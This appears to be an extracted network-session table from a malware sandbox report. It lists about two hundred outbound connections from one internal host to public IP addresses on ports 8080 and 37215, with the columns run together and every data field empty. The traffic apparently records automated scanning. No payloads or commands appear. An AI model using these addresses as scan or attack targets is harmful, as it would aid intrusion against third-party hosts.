                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7956192.168.2.234311068.141.84.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7957192.168.2.2339952209.166.100.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7958192.168.2.233550244.139.10.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7959192.168.2.235239298.192.112.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7960192.168.2.234742295.194.185.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7961192.168.2.234119448.106.95.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7962192.168.2.234253697.184.138.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7963192.168.2.23484444.149.105.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7964192.168.2.2335698106.203.120.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7965192.168.2.2360976162.63.197.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7966192.168.2.2337496189.15.1.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7967192.168.2.2336938158.50.65.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7968192.168.2.2358550143.156.245.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7969192.168.2.2333238134.124.230.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7970192.168.2.2338822108.173.174.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7971192.168.2.2346092161.218.238.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7972192.168.2.2359806210.235.254.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7973192.168.2.2349078130.107.178.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7974192.168.2.2348060109.37.150.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7975192.168.2.234539495.133.120.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7976192.168.2.235480663.114.204.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7977192.168.2.2346652135.67.150.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7978192.168.2.2356618160.156.247.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7979192.168.2.2342968160.79.233.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7980192.168.2.234854287.17.85.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7981192.168.2.2337766169.184.10.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7982192.168.2.2356168219.246.245.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7983192.168.2.2351000200.238.220.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7984192.168.2.2341888156.9.142.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7985192.168.2.233369468.48.236.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7986192.168.2.234632483.47.102.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7987192.168.2.2340314185.151.89.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7988192.168.2.2345796173.94.254.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7989192.168.2.2356672184.10.95.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7990192.168.2.234031025.70.139.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7991192.168.2.235546265.113.247.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7992192.168.2.2351282110.107.109.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7993192.168.2.2350746103.53.112.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7994192.168.2.2344182205.193.255.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7995192.168.2.235163242.206.116.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7996192.168.2.234852292.202.3.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7997192.168.2.2334794203.255.51.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7998192.168.2.235344834.70.106.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7999192.168.2.2344368216.206.59.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8000192.168.2.2339416140.168.129.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8001192.168.2.234966642.40.165.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8002192.168.2.2342082120.114.109.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8003192.168.2.2356806148.4.141.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8004192.168.2.2357470174.190.120.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8005192.168.2.2343302200.206.113.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8006192.168.2.235457052.233.199.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8007192.168.2.235876034.219.142.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8008192.168.2.2343488118.237.102.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8009192.168.2.235404823.34.86.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8010192.168.2.2348696169.34.173.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8011192.168.2.2359226220.237.211.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8012192.168.2.2334648161.241.189.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8013192.168.2.2334408123.21.187.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8014192.168.2.2337618120.200.113.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8015192.168.2.2343190100.167.39.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8016192.168.2.2360628186.55.92.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8017192.168.2.234363438.15.62.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8018192.168.2.2353804145.171.221.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8019192.168.2.2355682162.254.123.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8020192.168.2.234582472.153.16.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8021192.168.2.2354816120.29.241.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8022192.168.2.2350028203.41.83.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8023192.168.2.2357182111.146.61.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8024192.168.2.2345830218.193.75.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8025192.168.2.235454239.173.119.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8026192.168.2.235900258.172.144.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8027192.168.2.2334894138.107.35.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8028192.168.2.234837287.206.15.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8029192.168.2.2351318160.245.118.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8030192.168.2.2342444125.100.8.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8031192.168.2.234887444.121.144.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8032192.168.2.233743846.141.87.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8033192.168.2.2356810203.121.181.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8034192.168.2.234816884.45.131.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8035192.168.2.234344853.207.59.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8036192.168.2.235208241.155.68.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8037192.168.2.2343062124.237.155.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8038192.168.2.2354496148.169.16.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8039192.168.2.235438272.181.234.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8040192.168.2.2357910184.91.110.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8041192.168.2.234700680.60.71.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8042192.168.2.234707224.251.247.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8043192.168.2.2341020159.248.32.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8044192.168.2.2341842208.138.126.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8045192.168.2.2357268101.242.100.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8046192.168.2.2339370203.222.4.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8047192.168.2.234700064.14.144.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8048192.168.2.2340182202.11.248.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8049192.168.2.235685491.57.70.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8050192.168.2.233522887.245.54.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8051192.168.2.2355760201.42.56.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8052192.168.2.234960282.89.230.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8053192.168.2.235547624.64.37.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8054192.168.2.2355664138.18.152.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8055192.168.2.2360838193.171.60.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8056192.168.2.235156467.187.116.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8057192.168.2.233937038.235.199.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8058192.168.2.234196849.121.40.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8059192.168.2.234847874.166.41.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8060192.168.2.2335278174.49.207.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8061192.168.2.235960263.174.116.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8062192.168.2.2355474107.226.255.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8063192.168.2.2346364203.181.105.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8064192.168.2.234010839.163.229.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8065192.168.2.23564349.122.206.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8066192.168.2.233693219.145.173.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8067192.168.2.2360332201.101.95.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8068192.168.2.235407841.175.224.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8069192.168.2.2344154163.110.222.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8070192.168.2.2340952134.160.63.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8071192.168.2.2358396216.120.43.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8072192.168.2.2344840107.78.7.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8073192.168.2.234349025.49.117.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8074192.168.2.234646478.2.129.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8075192.168.2.2357520202.251.222.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8076192.168.2.2359682213.70.190.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8077192.168.2.236040886.232.69.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8078192.168.2.235616297.64.178.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8079192.168.2.2335784195.140.237.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8080192.168.2.235793644.163.94.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8081192.168.2.23401782.207.187.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8082192.168.2.2338868157.147.133.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8083192.168.2.2336556197.85.77.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8084192.168.2.2348218157.135.50.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8085192.168.2.2339514157.25.25.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8086192.168.2.2345734216.30.73.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8087192.168.2.2353918197.224.146.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8088192.168.2.236017285.195.7.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8089192.168.2.234549241.225.218.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8090192.168.2.234287841.70.176.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8091192.168.2.2357650197.6.100.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8092192.168.2.2348832157.150.195.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8093192.168.2.2333260111.74.233.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8094192.168.2.235724041.128.208.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8095192.168.2.2340128187.100.198.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8096192.168.2.2340808197.178.15.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8097192.168.2.2340832197.238.97.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8098192.168.2.2337454115.68.93.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8099192.168.2.233714041.152.247.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8100192.168.2.233978873.21.177.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8101192.168.2.2339784197.165.237.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8102192.168.2.2345262157.228.183.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8103192.168.2.235813447.242.216.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8104192.168.2.2337720197.168.41.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8105192.168.2.2351706223.123.16.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8106192.168.2.2357640157.120.243.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8107192.168.2.2337552105.135.211.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8108192.168.2.234664641.104.65.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8109192.168.2.2334222197.55.247.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8110192.168.2.235111241.4.159.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8111192.168.2.234836241.148.83.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8112192.168.2.234643241.72.75.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8113192.168.2.235763441.254.230.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8114192.168.2.2347076197.190.234.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8115192.168.2.2336332208.102.117.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8116192.168.2.2333844197.243.194.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8117192.168.2.236067641.68.41.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8118192.168.2.2357910157.216.94.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8119192.168.2.235784241.202.99.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8120192.168.2.234990641.185.47.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8121192.168.2.2339956197.176.6.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8122192.168.2.233582660.95.208.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8123192.168.2.2334624157.120.123.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8124192.168.2.2347554197.203.54.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8125192.168.2.235757841.171.240.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8126192.168.2.2344796197.50.255.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8127192.168.2.2345836197.103.48.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8128192.168.2.235565465.93.101.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8129192.168.2.2349120181.27.49.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8130192.168.2.2355770197.109.53.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8131192.168.2.2360960147.224.202.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8132192.168.2.233576241.153.64.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8133192.168.2.234347620.131.168.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8134192.168.2.2354086157.153.254.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8135192.168.2.235124062.193.16.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8136192.168.2.2360002157.84.54.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8137192.168.2.2341142107.119.250.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8138192.168.2.2332806190.37.181.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8139192.168.2.2344452133.199.233.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8140192.168.2.2355376108.33.41.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8141192.168.2.2343578197.89.194.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8142192.168.2.234147854.44.101.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8143192.168.2.2343988107.144.9.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8144192.168.2.235262841.0.79.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8145192.168.2.233305246.153.47.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8146192.168.2.235089241.157.83.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8147192.168.2.233769441.55.252.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8148192.168.2.233521025.49.130.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8149192.168.2.2351206197.237.74.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8150192.168.2.2358556157.66.91.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8151192.168.2.2357926197.208.58.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8152192.168.2.236055441.104.64.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8153192.168.2.2341102157.191.232.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8154192.168.2.2335754157.120.31.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8155192.168.2.233633041.236.90.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8156192.168.2.233942441.221.212.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8157192.168.2.235474241.11.35.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8158192.168.2.2340124157.238.92.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8159192.168.2.2353986101.229.79.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8160192.168.2.2332990107.190.139.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8161192.168.2.2339712157.241.76.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8162192.168.2.2349364157.14.183.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8163192.168.2.2350222197.235.89.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8164192.168.2.2352920197.133.26.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8165192.168.2.234335641.80.120.1637215
                                                        TimestampBytes transferredDirectionData


